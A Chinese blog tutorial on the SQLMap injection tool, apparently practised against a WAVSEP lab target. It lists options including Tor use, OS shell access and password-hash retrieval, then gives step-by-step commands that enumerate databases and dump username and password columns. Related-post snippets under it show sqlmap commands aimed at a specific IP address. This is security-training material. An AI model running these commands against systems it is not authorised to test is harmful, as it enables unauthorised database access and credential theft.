SQLMap的使用介绍

原创 于 2025-10-16 16:08:21 发布 · 836 阅读 · 8 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #运维

一、sqlmap选项

目标:至少要选中一个参数

  • -u URL, --url=URL 目标为 URL (例如. “http://www.landui.com/vuln.php?id=1”)
  • -g GOOGLEDORK 将谷歌dork的结果作为目标url

请求:
这些选项可用于指定如何连接到目标URL

  • –data=DATA 数据字符串通过POST发送
  • –cookie=COOKIE HTTP Cookie的值
  • –random-agent 随机选择 HTTP User-Agent 头的值
  • –proxy=PROXY 使用代理去连接目标URL
  • –tor 使用匿名网络
  • –check-tor 检查Tor是否正确使用

注入:
这些选项可用于指定要测试哪些参数,提供自定义注入负载和可选篡改脚本

  • -p TESTPARAMETER 可测试的参数
  • –dbms=DBMS 将后端DBMS强制到此值

检测:
这些选项可用于定制检测阶段

  • –level=LEVEL 执行的测试级别(1-5, 默认 1)
  • –risk=RISK 执行测试的风险 (1-3, 默认 1)

技术:
这些选项可用于调整特定SQL注入的测试的技术

  • –technique=TECH SQL注入技术选择 (默认 “BEUSTQ”)

枚举:
T这些选项可用于枚举后端数据库管理系统的信息、结构和数据表。此外,还可以运行自己的SQL语句

  • -a, --all 检索全部
  • -b, --banner 检索 banner
  • –current-user 检索当前用户
  • –current-db 检索当前数据库
  • –passwords 列出用户密码的hash值
  • –tables 列出表
  • –columns 列出字段
  • –schema 列出DBMS schema
  • –dump Dump DBMS数据库表的条目
  • –dump-all Dump 所有DBMS数据库表的条目
  • -D DB 指定数据库
  • -T TBL 指定表
  • -C COL 指定字段

操作系统访问:
这些选项可用于访问后端数据库管理系统底层操作系统

  • –os-shell 提示为交互式操作系统shell
  • –os-pwn 提示为OOB外壳,Meterpreter或VNC

通用:
这些选项可用于设置一些通用的工作参数

  • –batch 永远不要要求用户输入,使用默认行为
  • –flush-session 刷新当前目标的会话文件

杂项:

  • –sqlmap-shell 提示输入交互式sqlmap shell
  • –wizard 初学者的简单向导界面

二、sqlmap使用

1.对url进行检测,判断是否存在SQL注入

python sqlmap.py -u "url" --batch
跑完以后发现存在注入,,参数是username 注入类型为盲注,数据库是mysql,后端语言是jsp

2.获取数据库

python sqlmap.py -u URL --dbs --batch 获取全部数据库
python sqlmap.py -u URL --current-db --batch 获取当前数据库
获取到了当前的数据库为 wavsepDB

3.获取当前数据库里所有表

python sqlmap.py -u URL -D wavsepDB --tables --batch

4.获取表的字段

python sqlmap.py -u URL -D wavsepDB -T users --columns --batch

5.dump字段内容

python sqlmap.py -u URL -D wavsepDB -T users -C "password,username" --dump --batch
如果字段内容多的话可以再加上如 --start 1 --stop 100 这样就取1-100条数据
–dump 可以换成 --dump-all则导出全部的内容

Kaede6
关注
sqlmap使用手册(SQLMap下载、安装、使用)
啊渊的专栏
01-16 769
数据库指纹识别从数据库中获取数据访问底层文件系统在操作系统上执行命令它全面支持多种数据库管理系统,如MySQL、Oracle、PostgreSQL、Microsoft SQL Server等。此外,sqlmap还支持多种SQL注入技术,包括基于布尔盲、基于时间盲、基于错误、基于UNION查询、堆栈查询和带外查询等。
sqlmap命令大全
02-22
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)
sqlmap注入常用命令
智三岁的博客
02-22 1205
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项 目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. "http://www.site.com/vuln.php?id=1") -g GOOGLEDORK ...
sqlmap的注入使用常用命令
weixin_43560176的博客
07-06 568
SQLmap的注入使用 sqlmap的注入使用常用命令 SQLmap是一款强大的注入工具,相比经典的啊D和明小子之类的注入工具,SQLmap功能更加强大,无论是自带字典,功能还是界面优化,都是一款非常不错的注入工具,sqlmap可以多平台 运行,windows,linux下都可以进行access,mysql,mssql等数据库的注入 ,更重要的是sqlmap是一款开源的工具 注入命令详解: 找到sqlmap路径,在CMD里面输入CD CC路径进入到SQLMAP路径目录下,然后输入python sqlmap.
sqlmap注入命令大全
m0_63028223的博客
04-17 3063
sqlmap -u "注入点地址" --dbs扫描数据库 "http://110.40.154.100:8080/index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=" -D joomla --tables 打开数据库中的 ”joomla表格 sqlmap -u "http://110.40.154.100:8080/index.php?option=com_fiel...
SQLMAP 命令详解
安全苦行僧
05-30 512
SQLMAP 命令详解 Options(选项):–version 显示程序的版本号并退出-h, –help 显示此帮助消息并退出-v VERBOSE 详细级别:0-6(默认为 1)Target(目标):以下至少需要设置其中一个选项,设置目标 URL。-d DIRECT 直接连接到数据库。-u URL, –url=URL 目标 URL。-l LIST...
sqlmap使用介绍
06-22
通过上述详细的介绍,我们可以看出SQLMap不仅功能强大,而且提供了丰富的配置选项,以适应各种复杂的注入场景。无论是渗透测试人员还是网络安全爱好者,掌握SQLMap使用都是提升技能的重要一步。
Sqlmap使用手册中文版
01-13
用户手册详尽地介绍Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当进行Web应用审计时,如果发现页面中的参数(如GET、POST或Cookie)可能受到用户输入的影响,Sqlmap...
sqlmap使用说明.pptx
04-02
介绍了 渗透测试工具 sqlmap使用方法。 对sqlmap -tamper 脚本的使用进行了演示。 burpsuite中sqlmap的插件进行了简单的介绍
SQLMAP参数介绍.pdf
09-25
以下是关于SQLMAP的详细介绍: 1. **SQLMAP的功能**: - **URL分析**:SQLMAP会对提供的URL进行扫描,识别出可注入的参数,并确定适合的SQL注入技术。 - **数据库识别**:一旦发现注入点,SQLMAP会尝试识别出正在...
sqlmap注入命令详解
08-19
使用sqlmap进行数据库注入漏洞测试,高效,快速
sql注入之——SQLMap常见语句
温柔小薛的博客
07-19 4214
填坑~~ SQLMap常见语句 首先要明确 整个的单词 需要用两个横杠– 缩写的单词 需要一个横杠- 参考:https://www.freebuf.com/sectool/164608.html 一、个人常用语句总结: 1、最常用URL注入语句 sqlmap.py -u http://192.168.0.102/sqlserver/1.aspx?xxser=1 –level=LEVEL 执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数
sqlmap 注入教程 常用命令大全
weixin_44286136的博客
05-19 1548
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage –hh 帮助手册 详细 sqlmap.py -u “注入地址” --dbs // 列举数据库 sqlmap.py -u “注入地址” --current–db // 当前数据库 sqlmap.py -u “注入地址” --users // 列数据库用户 sqlmap.py -u “注入地址” --c
sqlmap注入教程 常用指令
qq_58000413的博客
06-29 2054
sqlmap一些指令
sql注入(sqlmap
qq_62046696的博客
07-01 1088
通过id的报错可以判断是字符型注入,order by 得出字段数是3简单来说,就是利用参数二的特殊字符串,去匹配参数一中的东西。 正常情况下 参数二的特殊字符串就是一段符合xpath语法规则的字符串。当参数二不符合xpath语法规矩,这个函数就会报错,显示出参数二的内容。 报错注入就是利用这个原理来进行的。 看例子,这里的参数一是随便写的1,参数二是concat(0x7e,(select version()),0x7e) concat函数是用来连接字符串的,就是将它的所有参数连接起来。 0x7e代表的
sqlmap注入命令
WOSHISUNXIANGFU的专栏
03-11 1295
sqlmap Linux的开源免费工具:http://sqlmap.org/ 使用命令: ./sqlmap.py -u "http://xyz:1234/web/questions/questionlist" --data "tid=12345678" –dbs          //列举数据库 ./sqlmap.py -u "http://xyz:1234/web/question
Sqlmap常用命令总结及注入实战(Access、mysql
热门推荐
OKAY_TC的博客
11-19 5万+
sqlmap常用命令总结: 注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行) 1#、注入六连: 1. sqlmap -u "http://www.xx.com?id=x" 【查询是否存在注入点 2. --dbs 【检测站点包含哪些数据库 3. --current-db 【获取当前的数据库...
Sqlmap对不同注入使用的参数命令(持续更新)
最新发布
weixin_43520214的博客
09-29 1450
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值